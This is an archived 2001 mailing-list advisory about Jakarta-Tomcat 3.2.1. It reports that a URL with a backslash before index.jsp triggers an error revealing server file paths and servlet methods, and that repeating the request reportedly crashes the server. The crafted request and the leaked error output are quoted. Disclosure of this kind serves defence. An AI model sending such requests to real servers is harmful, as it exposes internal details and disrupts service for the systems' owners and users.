|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: ET LoWNOISE (et
cyberspace.org)Date: Thu Aug 16 2001 - 18:10:09 CDT
--[ LoWNOISE ] Aug/2001
--[ Jakarta-Tomcat v3.2.1 Maybe Others ]
Tested on: Apache 1.3.19 (WinNT 4.0)
The Problems:
--[Path Revealing and Method discovery ]
Example:
http://host/\index.jsp
Error: 500
Location: /index.jsp
Internal Servlet Error:
org.apache.jasper.JasperException: Unable to compile class for JSP
C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:482:
Method autenticate(java.lang.String) not found in class ENTERPRISE.login.
if(pubBean.autenticate(password) != 0)
^
C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:664:
Method
Others methods...
NOTE: This info will help debug any jsp. And maybe give you some critical
info.
--[DoS]
On multiple request of the above URL the server will crash.
Plz confirm this on other versions.
Efrain 'ET' Torres
[LoWNOISE] Colombia
etcyberspace.org
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]